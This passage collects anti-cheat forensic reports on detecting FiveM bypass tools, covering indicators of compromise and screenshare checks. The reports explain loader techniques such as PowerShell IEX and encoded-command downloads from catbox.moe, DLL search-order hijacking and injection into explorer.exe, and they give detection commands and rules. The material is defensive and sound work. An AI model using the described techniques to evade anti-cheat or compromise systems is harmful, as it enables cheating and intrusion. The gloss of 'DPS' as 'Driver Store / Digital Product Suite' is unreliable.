search for any record whose hostname contains keyauth.win. The DNS cache is populated when the bypass performs its license check and persists until TTL expiry or the next system reboot. On most configurations the TTL for keyauth responses is short, so a live cache hit indicates the bypass ran within the past few minutes to hours. For targeted output run: ipconfig /displaydns | findstr /i "keyauth". No output from a flushed cache is not exculpatory — proceed to the lsass check. 3 ### LSASS memory — keyauth.win string artifact Open System Informer as administrator, locate the lsass.exe process in the process list, and open its Properties. Navigate to the Memory tab and use the Find Strings function with the search term keyauth. The Star.xyz authentication module writes the full endpoint URL into lsass memory during the license validation handshake. This artifact survives DNS cache flushes and persists in lsass memory pages until they are overwritten or the system restarts. A hit in lsass alongside a DNS cache entry constitutes a high-confidence dual confirmation of the Star.xyz bypass having been active in the current session. keyauth.win in DNS / lsass.exe (1 of 2) ![keyauth.win created in the DNS cache and LSASS process](https://clubhouseac.shop/research/starxyz/keyauth-1.png) keyauth.win in DNS / lsass.exe (2 of 2) ![keyauth.win string resident in the LSASS process](https://clubhouseac.shop/research/starxyz/keyauth-2.png) 4 ### LastActivityView — execution record LastActivityView (NirSoft) aggregates execution history from multiple Windows sources including prefetch, UserAssist registry keys, and the Windows Event Log. Run it and sort by time. Look for entries corresponding to the Star.xyz executable filename or to any unexpected 4–5 MB executable in a user-writable directory within the timeframe under investigation. Prefetch entries are particularly valuable as they record a hash of the executable path and a run count. Even if the binary has been deleted from disk, the prefetch file under C:\\Windows\\Prefetch\\ will contain the original filename and last execution timestamp. LastActivityView — Star.xyz execution record ![LastActivityView execution record for the Star.xyz bypass](https://clubhouseac.shop/research/starxyz/lastactivityview.png) 5 ### Journal Trace — DLL drop entries Use a Journal Trace utility or fsutil usn readjournal C: csv to export the NTFS change journal. Filter the output for any DLL files created in user-writable directories around the time of the suspected bypass execution. Star.xyz may extract or drop auxiliary DLLs as part of its injection process — journal entries for these will outlast the files themselves if they have since been deleted. Journal Trace — Star.xyz DLL drop (1 of 2) ![USN Journal trace for the Star.xyz DLL (1 of 2)](https://clubhouseac.shop/research/starxyz/journal-trace-1.png) Journal Trace — Star.xyz DLL drop (2 of 2) ![USN Journal trace for the Star.xyz DLL (2 of 2)](https://clubhouseac.shop/research/starxyz/journal-trace-2.png) 6 ### Everything tool — file discovery If the bypass binary is still on the system, the Everything search tool (voidtools) can locate it instantly by searching for the partial SHA hash embedded in the filename if the user renamed it predictably, or by filtering on file size (4.54 MB = approximately 4,762,624 bytes). Sort results by date modified to surface recently placed files. Everything also indexes files in normally hidden directories, unlike Windows Explorer. Everything — Star.xyz file located by size ![Everything search locating the Star.xyz files by size](https://clubhouseac.shop/research/starxyz/everything.png) 7 ### VirusTotal hash lookup Navigate to virustotal.com and submit the SHA-256 hash ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4. Multiple anti-cheat and AV vendors have flagged this sample. Review the detection names, the PE header metadata visible in the Details tab, and the Behaviour tab for recorded network connections to keyauth.win infrastructure. VirusTotal — Star.xyz (SHA-256 ce5f6779…f7ea47b4) ![VirusTotal detections for the Star.xyz bypass](https://clubhouseac.shop/research/starxyz/virustotal.png) Star.xyz bypass — interface opened ![Star.xyz bypass interface opened](https://clubhouseac.shop/research/starxyz/bypass-open.png) Screenshare Check Methodology ----------------------------- 1 ### Hash the executable if present on disk Ask the subject to open a Command Prompt and run certutil -hashfile SHA256 on the suspicious file. Compare the output in real time against the known SHA-256. If the file has been deleted, proceed directly to runtime memory and artifact checks. 2 ### DNS cache dump for keyauth.win In an elevated Command Prompt: ipconfig /displaydns | findstr /i keyauth. Watch the output together. A blank result after this command does not clear suspicion — the DNS cache may have been flushed. Proceed to the lsass check. 3 ### System Informer lsass memory string search Open System Informer as administrator. Locate lsass.exe → Properties → Memory → Find Strings. Search for keyauth. A result here is a strong positive indicator and cannot be dismissed as a DNS cache artefact — it requires the authentication module to have actively run within the current Windows session. 4 ### LastActivityView execution history review Run LastActivityView and sort by the Action Time column in descending order. Scroll through the most recent activity looking for unfamiliar executables. Ask the subject to not close or filter the results. Any entry for a file matching the approximate size or name of the Star.xyz binary is a corroborating indicator of execution. 5 ### Prefetch directory spot check Navigate to C:\\Windows\\Prefetch\\ in Windows Explorer (requires admin). Sort by date modified. Look for any prefetch file (extension .pf) created or modified around the suspected bypass run time. The filename portion before the dash is the executable name. Open a suspicious prefetch file with WinPrefetchView to see the full original path and run count. 6 ### USN journal DLL entry review Run fsutil usn readjournal C: csv > journal.csvand open the file. Filter on the .dll extension and sort by timestamp. Any DLL creation event in a temp or user directory close to the suspected execution window is a supporting artifact confirming the bypass deployed a secondary component. Detection Notes --------------- The dual keyauth.win signature — DNS cache plus lsass memory string — is the most reliable detection path for Star.xyz. These two indicators come from entirely different OS subsystems (DNS resolver and LSASS process memory) and would require two separate remediation actions to remove. A user who flushes DNS but does not restart will still carry the lsass string; a user who restarts to clear lsass will regenerate the DNS entry the next time the bypass runs. The known-good SHA-256 and SHA-1 hashes provide static identification that is independent of any runtime behaviour. These hashes should be cross-checked against VirusTotal before and after any screenshare session to establish whether the subject is running a known variant. Prefetch and LastActivityView entries provide timeline evidence that survives binary deletion. Even if the subject deletes the executable before the screenshare, the execution record in prefetch and the memory artifacts in lsass (pending reboot) provide sufficient evidence of past use within the current session. --- # XRC Bypass: PowerShell IEX In-Memory Loader with Future-Dated DPS | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 XRC Bypass: PowerShell IEX In-Memory Loader with Future-Dated DPS ================================================================= XRC uses PowerShell Invoke-Expression to load its payload entirely in memory — no file is written to disk. Despite this, Event Viewer records the IEX invocation at Event ID 800. A deliberately timestomped DPS first-seen date of 2038/07/16, a PcaSVC entry at 0x11a000, a .CRDOWNLOAD journal artifact, and the companion Destemido Cleaner.exe round out a robust IOC set. FiveMBypass DetectionPowerShell IEXFuture Timestampkeyauth.win Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- XRC employs PowerShell's Invoke-Expression (IEX) cmdlet to receive its payload as a string — downloaded at runtime from a remote source — and execute it entirely within the PowerShell process's memory space. No payload binary is written to the filesystem, which prevents simple file-based scanning from detecting it. This technique is well-established in malware tradecraft but remains detectable through Windows' own script block logging and pipeline execution telemetry. The DPS (Driver Store / Digital Product Suite) component registered by the installer carries a first-seen timestamp of 2038/07/16 — a date twelve years in the future, far beyond any plausible legitimate installation scenario. This is deliberate timestomping: by setting the timestamp to the distant future, the developer attempts to push the entry to the bottom of any time-sorted investigation view, making it less likely to be noticed during a quick review. The bypass is distributed with a companion utility, Destemido Cleaner.exe, which is marketed as a log-cleaning tool. Its presence on a system is itself an IOC. The payload was downloaded via Chrome, leaving a .CRDOWNLOAD partial-download journal artifact — a Chrome-specific temporary file extension for in-progress downloads — visible in the NTFS journal even after the download completed and the temporary file was removed. C2 authentication proceeds through keyauth.win. Primary IOCs ------------ 1 ### PowerShell Event ID 800 in Event Viewer Open Event Viewer and navigate to Windows Logs → Windows PowerShell. Filter for Event ID 800, which is logged whenever a pipeline execution involving Invoke-Expression runs. Each IEX invocation produces an event containing the full command line passed to IEX, including any encoded or decoded payload string that was executed in memory. Search for event entries occurring in the session timeframe under review. An entry with IEX or Invoke-Expression in the detail field, combined with a URL string or encoded payload content, confirms the in-memory loader was active. Export the event to XML for full detail preservation. 2 ### DPS timestamp anomaly — 2038/07/16 Open the Driver Store viewer or examine the DPS component manifest for the XRC installer entry. The first-seen timestamp will read 2038/07/16 — a date that is physically impossible for any software first installed in the present. No legitimate driver or system component carries a future first-seen timestamp. This is a definitive indicator of deliberate timestamp manipulation. In the context of a screenshare review, ask the subject to open Windows Settings → Apps → Installed Apps and sort by install date. Any application showing a 2038 date is immediately anomalous and should be cross-referenced with its executable path for further investigation. 3 ### PcaSVC entry at offset 0x11a000 Examine the PcaSVC execution log for an entry at offset 0x11a000. This offset corresponds to the XRC loader component recorded by the Program Compatibility Assistant Service when the installer or a companion executable first ran. The entry includes the binary path and execution timestamp as logged by Windows compatibility telemetry — independent of any user-space cleanup that may have occurred subsequently. 4 ### SHA-256 hash of companion binary If any component of XRC remains on disk, compute its SHA-256 hash. The known hash for this build is 9d8038d5f03503704ee237ed72b8683e0261a254951ad0ce717842a27672b2ff. Run certutil -hashfile SHA256 and compare. Submit to VirusTotal for multi-vendor confirmation. Components to check include the primary loader, any Destemido Cleaner.exe instance, and any unsigned executable recently created in user-writable directories. 5 ### Journal Trace — .CRDOWNLOAD file entry Examine the NTFS change journal using a Journal Trace utility or fsutil usn readjournal C: csv. Filter journal entries for filenames ending in .crdownload. Chrome creates these temporary files during active downloads and normally removes them upon completion — but the NTFS journal retains the creation and deletion record. The presence of a .crdownload entry for a filename associated with the bypass confirms it was downloaded through Chrome during the session under review. 6 ### Destemido Cleaner.exe identification Search the filesystem for Destemido Cleaner.exe using where /r C:\\ "Destemido\*" from an elevated Command Prompt. If found, hash the file and inspect its strings with DIE. Its presence alongside any other XRC-related artifact confirms that the user is running the full XRC suite, not an isolated PowerShell script. The cleaner's purpose — removing traces — is itself an indicator of knowledge and intent. 7 ### keyauth.win C2 in DNS cache and lsass memory Run ipconfig /displaydns | findstr /i keyauth to check the DNS cache. Then open System Informer, locate lsass.exe, and search its memory for the string keyauth. Either indicator confirms that authentication through keyauth.win occurred in this session. As with other keyauth-based bypasses, this domain has no legitimate presence on a gaming PC. In-Memory Loading & PowerShell IEX ---------------------------------- PowerShell's Invoke-Expression cmdlet takes a string argument and executes it as a PowerShell command or script block. When used as a loader, the operator downloads the payload as an encoded string (often Base64 or AES-encrypted) from a remote URL, decodes it at runtime, and passes it directly to IEX. Because the decoded payload exists only in the PowerShell process's memory heap, it is never written to the filesystem as a standalone file and therefore cannot be detected by file-based on-access scanners or located in a standard directory listing. However, Windows PowerShell's script block logging and pipeline execution logging — when enabled, and often enabled by default since Windows 10 — record the evaluated content of IEX calls in the Windows PowerShell event log under Event ID 800 (pipeline execution) and Event ID 4104 (script block logging, under Microsoft-Windows-PowerShell/Operational). These logs capture the content of the script block after decoding, exposing the actual payload code even when the loader itself took significant steps to obfuscate the download string. The XRC loader's use of IEX is therefore detectable not through file forensics but through event log forensics. Investigators should treat any unexplained Event ID 800 or 4104 entry containing encoded content, URL strings, or injection-related API names (such as VirtualAlloc, WriteProcessMemory, or CreateRemoteThread) as a strong indicator of in-memory payload delivery. Screenshare Check Methodology ----------------------------- 1 ### Event Viewer PowerShell log — Event ID 800 Open Event Viewer (eventvwr.msc) and navigate to Windows Logs → Windows PowerShell. Click Filter Current Log and enter 800 in the Event IDs field. Walk through results in the session timeframe. Share the detail pane on screen for any entry referencing IEX, a URL, or encoded content. Also check Microsoft-Windows-PowerShell/Operational for Event ID 4104. 2 ### Installed apps date sort — 2038 timestamp check Open Settings → Apps → Installed Apps and sort by install date descending, then ascending. Entries with dates in 2038 or otherwise in the future will appear at the extreme end of the list in either direction. Ask the subject to scroll through both ends of the sorted list on screen. A 2038-dated entry for any application not associated with a time-synchronized enterprise deployment tool is conclusive timestomping. 3 ### Destemido Cleaner.exe filesystem search In an elevated Command Prompt, run where /r C:\\ "Destemido\*". Share the output on screen. Any match confirms the companion cleaner is present. Also check the user's Downloads and Desktop directories manually by navigating them in Explorer with hidden files visible (View → Show → Hidden items). 4 ### DNS cache and lsass keyauth.win check Run ipconfig /displaydns | findstr /i keyauth in the elevated Command Prompt. Follow up with System Informer: locate lsass.exe → Properties → Memory → Find Strings → search keyauth. Share both outputs on screen. 5 ### Journal Trace CRDOWNLOAD artifact Run a Journal Trace scan or export the USN journal with fsutil usn readjournal C: csv > journal.csv. Open the output and filter for .crdownload filenames. Timestamps on any matching entries will indicate when the download occurred and can be correlated with the PowerShell Event ID 800 timestamp to reconstruct the delivery timeline. 6 ### Hash any remaining XRC components If any XRC-related file is found on disk, hash it with certutil -hashfile SHA256 and compare against the known hash 9d8038d5...2ff. Submit to VirusTotal live on screen to show the detection result in context. Even a clean VirusTotal result for a file with a future-dated DPS entry and IEX Event Viewer logs remains highly suspicious. Detection Notes --------------- The future-dated DPS timestamp is one of the most visually distinctive artifacts in this IOC set. It requires no specialist tooling to identify — a simple sort of the installed applications list by date will surface it immediately. The deliberate manipulation of timestamps to evade detection is itself evidence of knowledge and intent, which carries independent evidentiary weight beyond simple tool detection. The IEX in-memory technique is more technically sophisticated but produces reliable Event Viewer artifacts that persist until the event log is cleared or rolls over. Investigators should check the PowerShell operational log size and last-cleared timestamp: a recently cleared log on a system with other bypass indicators suggests deliberate evidence destruction. The presence of Destemido Cleaner.exe alongside XRC artifacts establishes a pattern of deliberate anti-forensic behavior. Users who possess dedicated log-cleaning utilities distributed with bypass software have demonstrated awareness that their activities are detectable and have taken steps to obstruct detection — context relevant to enforcement severity. --- # Ninez Hider: PowerShell EncodedCommand Downloading from Catbox.moe | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Ninez Hider: PowerShell EncodedCommand Downloading from Catbox.moe ================================================================== Ninez Hider launches a PowerShell process with the `-encodedCommand` flag, passing a base64-encoded payload to evade command-line logging. The decoded payload downloads a second-stage binary from `files.catbox.moe` — a public file hosting service routinely abused for malware staging. Critically, the encoded command and the catbox.moe URL both survive in `ConsoleHost_history.txt`, providing reliable forensic artifacts. FiveMBypass DetectionPowerShellEncodedCommandcatbox.moe Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Ninez Hider uses a two-stage loader design built around PowerShell's built-in base64 execution support. The operator invokes `powershell.exe` with the `-encodedCommand` (or `-enc`) flag, supplying a base64-encoded string in place of a plaintext command. This approach is intended to prevent casual log inspection from revealing the true payload URL. The second stage is fetched from `files.catbox.moe`, a public file hosting platform that requires no account for anonymous uploads. Its lack of registration requirements makes it a preferred staging host for low-sophistication cheat loaders. The primary forensic weakness of this technique is that PowerShell's PSReadLine module records every command entered in an interactive session to `ConsoleHost_history.txt` — including `-encodedCommand` invocations with the full base64 blob. Even if the actor attempts to wipe evidence, this file persists at a fixed path under the user profile and survives standard cleanup scripts that do not know to target it. The base64 string in history can be decoded offline to recover the original catbox.moe download URL. Primary IOCs ------------ 1 ### ConsoleHost\_history.txt inspection Navigate to `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`. Open with any text editor. Look for lines containing `-encodedCommand` or the short alias `-enc` followed by a long base64 string. This file is not cleared by standard bypass cleanup routines. 2 ### Base64 -encodedCommand entry in history A Ninez Hider invocation will appear similar to: `powershell -enc `. The base64 blob is typically 80–300 characters. Copy the blob — it decodes to a UTF-16LE string (PowerShell's native encoding). Decode with: `[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(''))` 3 ### Catbox.moe download URL recovery After decoding, the plaintext command will contain a `Invoke-WebRequest`, `(New-Object Net.WebClient).DownloadFile`, or similar download call targeting a URL on `files.catbox.moe`. The path component of the URL (e.g. `/.exe`) identifies the specific staged payload. Record this URL as a network IOC. 4 ### Decoded command analysis Beyond the download URL, the decoded command may reveal the output path where the second stage is written on disk, execution method (Start-Process, Invoke-Expression, etc.), and any additional arguments. Cross-reference the output path against Prefetch records and Journal Trace entries to confirm execution of the downloaded binary. 5 ### Network IOC: files.catbox.moe in DNS cache Run `ipconfig /displaydns` in an elevated Command Prompt. A cache entry for `files.catbox.moe` or its CDN endpoints confirms that the host made an outbound DNS resolution for the staging server. This persists until the DNS cache is flushed and is independent of the PowerShell history file. PowerShell Encoded Commands & History ------------------------------------- PSReadLine, which ships as a default module since PowerShell 5.1, maintains a per-user command history at `ConsoleHost_history.txt`. Every command executed in an interactive console session is appended to this file. The critical point for investigators: the _entire invocation line_ is recorded, including the base64 blob passed to `-encodedCommand`. Bypass authors frequently attempt to clear evidence by deleting Prefetch files, wiping Event Logs, or running `Clear-History` within the same PowerShell session. However, `Clear-History` only clears the in-memory history buffer for the current session — it does not modify `ConsoleHost_history.txt` on disk. Targeted deletion of the file itself requires the actor to know the exact path, which many low-sophistication bypass scripts do not. To decode a recovered blob manually: PowerShell encodes commands as UTF-16LE before base64-encoding. Standard base64 decoders expecting ASCII/UTF-8 will produce garbled output. Use PowerShell directly, or a tool that supports UTF-16LE decoding (e.g., CyberChef with "Decode text → UTF-16LE" after base64 decode). Screenshare Check Methodology ----------------------------- 1 ### Open ConsoleHost\_history.txt live Ask the subject to open Run (`Win+R`), paste `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`, and press Enter. Notepad should open the file. Scroll through all entries. A visible `-enc` or `-encodedCommand` line is an immediate positive IOC. 2 ### DNS cache check for catbox.moe Ask the subject to open an elevated Command Prompt and run `ipconfig /displaydns | findstr catbox`. Any result confirms a DNS resolution to the catbox staging host. The `findstr` filter ensures the output is clean and visible on screen. 3 ### PowerShell process history in Task Manager Open Task Manager → Details tab. Look for any running `powershell.exe` or `pwsh.exe` processes. Right-click → Open file location to verify the executable path is the legitimate system PowerShell and not a repackaged loader. 4 ### Prefetch check for powershell.exe Open WinPrefetchView (NirSoft) and locate `POWERSHELL.EXE-*.pf`. Check the last run times and the file paths listed in the prefetch entry. Cross-reference with the ConsoleHost\_history.txt timestamps for corroboration. 5 ### Downloads folder and temp paths Check `%USERPROFILE%\Downloads`, `%TEMP%`, and `%APPDATA%` for any unexplained executables or `.sys` files dropped around the timestamp of the decoded command. The output path from the decoded PowerShell command should match an artifact location on disk. Detection Notes --------------- **ConsoleHost\_history.txt is the primary pivot point.** It survives most cleanup attempts and is sufficient on its own to establish that an encoded PowerShell command was executed and to recover the original payload URL. Even if the downloaded binary has been deleted, the DNS cache and download URL provide strong supporting evidence. Network defenders can block or alert on DNS resolutions to `files.catbox.moe` at the firewall or DNS resolver level. While catbox.moe has legitimate uses, its presence in a gaming system's DNS cache with no corresponding browser history entry for the domain is suspicious. For endpoint detection, monitoring for `powershell.exe` invocations with `-enc` or `-encodedCommand` flags via Windows Event Log (Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1) provides proactive detection before any artifact is committed to disk. --- # Xytrus Bypass: Unity Game DLL Masquerade Injecting into Explorer | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Xytrus Bypass: Unity Game DLL Masquerade Injecting into Explorer ================================================================ Xytrus abuses the Unity game runtime directory structure — specifically Crab Game's install — to plant a modified UnityPlayer.dll alongside a repackaged UnityCrashHandler64.exe. Once triggered, the loader injects into explorer.exe for persistent, low-visibility operation. This report covers all observable IOCs and screenshare-based detection steps. FiveMBypass DetectionUnity MasqueradeExplorer InjectionDLL Hijack Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Xytrus is a FiveM anti-cheat bypass that leverages the legitimate Unity Engine runtime directory structure as a staging ground for its malicious components. Rather than dropping files in an obvious location like `AppData\Local\Temp`, the operator installs the bypass into the Crab Game directory — a legitimate Unity-based game available on Steam — making the files appear as standard engine components to a casual observer. The two primary masquerade files are `UnityCrashHandler64.exe` and a trojaned `UnityPlayer.dll`. Both filenames are valid components in any Unity game installation, which is precisely what makes this technique effective against unsophisticated screenshare reviews. After the bypass component executes, it injects a payload into `explorer.exe` — the Windows shell host — which provides persistence across sessions without requiring a separate service or scheduled task. The injected DLL runs within the explorer.exe address space, making it invisible to naive process listings that only show top-level process names. Detection requires correlating multiple data sources: execution history (LastActivityView), file modification timestamps, and live module enumeration inside explorer.exe via System Informer or a comparable tool. Journal Trace creation events can also corroborate the initial drop time independently of NTFS timestamps, which may be tampered. Primary IOCs ------------ 1 ### UnityCrashHandler64.exe Execution Record (LastActivityView) Open LastActivityView and search for `UnityCrashHandler64.exe`. In a stock Crab Game installation this binary is never invoked during normal gameplay — it is only called when the Unity crash reporter fires, which is an exceptional event. Any execution record for this binary outside of a genuine game crash is highly suspicious. Pay attention to the timestamp of execution and whether it correlates with other anomalous process launches in the same timeframe. Xytrus typically invokes this binary as a loader stage, so its execution record will often be clustered with other unusual activity. 2 ### UnityPlayer.dll Modification Timestamp vs. Game Install Date Right-click `UnityPlayer.dll` in the Crab Game install directory and inspect the Last Modified timestamp. Cross-reference this with the Steam manifest file (`appmanifest_1108600.acf` in the Steam\\steamapps folder) to determine when the game was originally installed or last legitimately updated. If the DLL modification date post-dates the last Steam update by more than a few minutes, the file has been replaced. Note that attackers may attempt to forge NTFS timestamps using `SetFileTime`; corroborate with USN Journal or MFT record creation time. 3 ### UnityCrashHandler64.exe loading UnityPlayer.dll into explorer.exe Open System Informer (formerly Process Hacker) and navigate to the explorer.exe process. Switch to the Modules tab and scan the full list. Every legitimate DLL in explorer.exe should have a valid Microsoft or known-vendor signature. Any module showing an unknown or missing signature, particularly one with a path inside the Crab Game directory, is direct evidence of injection. Look specifically for DLLs loaded from paths that do not belong in a system process: `C:\Program Files (x86)\Steam\steamapps\common\Crab Game\` or adjacent directories. 4 ### USN Journal Creation Events for Masquerade Files Run `fsutil usn readjournal C: csv` or use a Journal Trace utility to query creation and modification records for the Crab Game install directory. A legitimate game install will show creation events at install time with subsequent modification events only during Steam updates. If Journal Trace shows a creation event for `UnityPlayer.dll` that is significantly newer than the surrounding game files, it was written by the bypass installer rather than Steam. This record is significantly harder to forge than standard NTFS timestamps. 5 ### Process Ancestry of UnityCrashHandler64.exe In System Informer's process tree or via Windows Event Log (Event ID 4688 with process creation auditing enabled), check what parent process spawned UnityCrashHandler64.exe. In a legitimate crash scenario, the parent will be the game's main executable (`Crab Game.exe`). If the parent is an unrelated process — a browser, a Discord overlay, or a loader binary — the execution was manufactured, not triggered by a genuine crash. This parent-child relationship is a reliable detection signal that survives even if the operator attempts to clean execution artefacts. Unity Directory Masquerade Explained ------------------------------------ Every Unity game ships with a predictable set of runtime files: `UnityPlayer.dll`, `UnityCrashHandler64.exe`, and various data folders. Crab Game is an ideal target for this technique because it is a free-to-play title with a substantial player base, making it plausible for a FiveM player to also have it installed, and because its Unity version ships with a crash handler that is structurally identical in name to what a bypass author would want to place there. The attacker replaces the legitimate `UnityPlayer.dll` with a modified version that contains the bypass payload. The original file is typically backed up or simply discarded. The replacement DLL exports the same functions as the real UnityPlayer to avoid breaking the game's startup sequence, while internally bootstrapping the bypass. `UnityCrashHandler64.exe` is repurposed as the activation stub — the binary a user or scheduled task runs to trigger the injection chain. Because the filename is legitimate, it passes a superficial screenshare review where a moderator only checks whether recognizable names are present, without verifying file integrity. The choice of explorer.exe as the injection target is deliberate. Explorer is always running, it hosts the shell, and many security tools exclude it from scanning to avoid UI disruption. A DLL injected into explorer.exe benefits from the process's long uptime and its exemption from aggressive monitoring in many endpoint configurations. Screenshare Check Methodology ----------------------------- 1 ### Navigate to Crab Game Install Directory Ask the player to open Steam, right-click Crab Game, select Manage → Browse Local Files. This opens the install directory. Inspect the file listing — specifically the timestamps of `UnityPlayer.dll` and `UnityCrashHandler64.exe` relative to the other game files. All stock game files should share similar modification timestamps from the last update. Any outlier that is dated after the rest of the directory contents warrants immediate further investigation. 2 ### Open LastActivityView and Filter for UnityCrashHandler64.exe Have the player run LastActivityView as administrator. Use the search or filter function to locate any entries referencing `UnityCrashHandler64.exe`. Record the timestamp and note whether the game was actually running or had just crashed at that moment — cross-reference with Steam play time logs if available. If the player cannot explain a recent execution of this binary, or if the execution time does not correspond to any known game session, treat this as a confirmed IOC. 3 ### Inspect explorer.exe Modules in System Informer Ask the player to open System Informer with administrator privileges. Locate explorer.exe in the process list and open its Properties → Modules tab. Sort by Path to group modules by directory. Any module not originating from `C:\Windows\`, `C:\Program Files\`, or a known signed vendor path should be flagged. Verify the signature column — unsigned or self-signed modules inside explorer.exe are extremely unusual and constitute strong evidence of injection. 4 ### Run fsutil USN Journal Query In an administrator Command Prompt, run `fsutil usn readjournal C: csv | findstr /i "crab"` to extract USN Journal entries referencing the Crab Game directory. Compare the creation timestamps of `UnityPlayer.dll` in the journal against the directory's other DLL files. A discrepancy between the journal creation date and the NTFS Last Modified timestamp is a strong indicator of timestamp manipulation. The journal entry is written by the kernel and is significantly more difficult to retroactively alter than file attributes. 5 ### Verify File Hash Against Known-Good Unity Builds Right-click `UnityPlayer.dll` and compute its SHA-256 hash using PowerShell: `Get-FileHash "UnityPlayer.dll" -Algorithm SHA256`. Cross-reference this hash against the known-good Unity version shipped with Crab Game — the correct hash can be derived from a clean installation or from a reference database. If the hash does not match the expected value for the installed Unity version, the file has been tampered with. This is the most definitive single check and should be performed whenever any of the prior signals are present. Detection Notes --------------- The Xytrus masquerade technique is effective precisely because it exploits reviewer complacency — moderators who only check that filenames "look right" will not catch it. The detection methodology above requires moving beyond name recognition to timestamp analysis, hash verification, and live process inspection. Note that the explorer.exe injection may persist across reboots if the bypass installs a Run key or scheduled task to re-trigger `UnityCrashHandler64.exe` at login. Check `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and Task Scheduler for entries referencing the Crab Game directory. Steam Integrity Check (right-click game → Properties → Local Files → Verify integrity) will detect the modified UnityPlayer.dll and re-download the original, but this also destroys the forensic artefact. If preservation for evidence purposes is needed, hash and copy the files before running verification. Server administrators should treat any player who has Crab Game installed and cannot account for a recent execution of UnityCrashHandler64.exe as a high-priority review candidate. The combination of unexplained execution history and any anomaly in the explorer.exe module list is sufficient justification for a ban pending further investigation. --- # Secure-Bzpass: Process Lasso DLL Hijack with Alt+F12 Injection | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Secure-Bzpass: Process Lasso DLL Hijack with Alt+F12 Injection ============================================================== Secure-Bzpass plants a malicious profapi.dll inside the Process Lasso installation directory, exploiting Windows DLL search order to load before the legitimate system copy. Injection is triggered on demand by the Alt+F12 hotkey. When the bypass unloads, the DLL file remains on disk — a persistent and recoverable artifact. FiveMBypass DetectionDLL HijackProcess Lassoprofapi.dll Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Secure-Bzpass exploits the Windows DLL search order to hijack Process Lasso, a legitimate process priority management utility published by Bitsum Technologies. When Process Lasso starts, Windows searches for required DLLs first in the application's own directory before falling back to C:\\Windows\\System32. The bypass exploits this behavior by placing a malicious copy of profapi.dll — a genuine Windows Profile API library that normally lives only in System32 — directly inside the Process Lasso installation directory. On Process Lasso startup, Windows finds the directory-local profapi.dll first and loads it into the Process Lasso process instead of the legitimate system copy. The malicious DLL exports the same function names as the real library (forwarding calls through to the genuine System32 version), ensuring Process Lasso continues to operate normally while the bypass payload executes within its process context. Injection activation is deferred to a user-triggered hotkey: Alt+F12. This design means the bypass DLL is loaded into Process Lasso on startup but does not inject into any FiveM process until the operator manually presses the hotkey — reducing behavioral anomalies that might be detected by time-of-startup analysis. When the bypass is later "destructed" or Process Lasso is closed, the DLL unloads from memory but the profapi.dll file in the Process Lasso directory persists on disk unchanged — the primary recoverable artifact. Primary IOCs ------------ 1 ### profapi.dll in Process Lasso directory — wrong location Navigate to the Process Lasso installation directory. Common paths are C:\\Program Files\\Process Lasso\\ or C:\\Program Files (x86)\\Process Lasso\\. List all files and look for profapi.dll. The legitimate Process Lasso installation does not include this file — it has no reason to ship its own copy of a core Windows Profile API library. profapi.dll should exist only in C:\\Windows\\System32\\ and C:\\Windows\\SysWOW64\\. Any profapi.dll found in an application's installation directory is a definitive DLL search order hijack artifact. Its presence alone, before any hash comparison, is grounds for escalated investigation. 2 ### SHA-256 hash comparison with legitimate profapi.dll Compute the SHA-256 hash of the suspicious profapi.dll found in the Process Lasso directory: certutil -hashfile "C:\\Program Files\\Process Lasso\\profapi.dll" SHA256. The known malicious hash is 6ce7c98b384dbe444a916e7e6580288549eca501315114916c1ee1908b5afff8. A match confirms the Secure-Bzpass DLL. Also compare against the legitimate System32 copy: certutil -hashfile C:\\Windows\\System32\\profapi.dll SHA256. The two hashes should differ — the System32 copy is the genuine Windows DLL; the Process Lasso copy is the hijack payload. 3 ### File size and creation date anomaly Run dir "C:\\Program Files\\Process Lasso\\profapi.dll" and compare the reported file size and creation timestamp against the genuine System32 copy. The legitimate profapi.dll in System32 for a given Windows build has a known size (typically 30–50 KB). A hijack DLL carrying a full bypass payload will be substantially larger. Additionally, the creation timestamp of the directory-local copy will reflect when the bypass was installed, not when Windows was installed — it will not align with the ages of other System32 DLLs. 4 ### Process Lasso process inspection in System Informer While Process Lasso is running, open System Informer with administrator privileges. Locate the ProcessLasso.exe or ProcLasso.exe process and open its Properties. Navigate to the Modules tab and inspect the list of loaded DLLs. The entry for profapi.dll will show its full load path. If the path reads C:\\Program Files\\Process Lasso\\profapi.dll rather than C:\\Windows\\System32\\profapi.dll, the hijack is confirmed as actively loaded in memory. Also inspect the Strings content of the loaded module in memory for bypass-related keywords such as menu names, hotkey descriptions (Alt, F12), or cheat feature names. The malicious DLL's internal strings will differ substantially from the Windows Profile API export table. 5 ### Unload/destruct behavior — DLL persists after crash When the bypass operator presses the unload or destruct control, the application will crash — the DLL is NOT deleted from disk despite the crash. This persistence is a deliberate design decision ensuring the DLL remains available for future use. Investigators should check the Process Lasso directory immediately after any reported crash to recover the artifact before the user can manually delete it. 6 ### DLL load event in Journal Trace Examine the NTFS journal for file creation events in the Process Lasso directory. Run a Journal Trace scan or use fsutil usn readjournal C: csv and filter for entries matching the Process Lasso directory path and filename profapi.dll. The creation timestamp in the USN journal records when the file was first written to that directory, establishing an installation timeline independent of any metadata the file itself may carry. DLL Search Order Hijacking in Process Lasso ------------------------------------------- Windows resolves DLL dependencies for a loaded executable by searching a defined sequence of directories. For most application configurations, the search order begins with the directory containing the application's own executable, then proceeds to the system directory (C:\\Windows\\System32), the Windows directory, and finally the directories listed in the PATH environment variable. This means any DLL placed in an application's folder will be loaded in preference to the identically-named DLL in System32. profapi.dll is an export-minimal Windows library implementing a small number of Profile API functions. Process 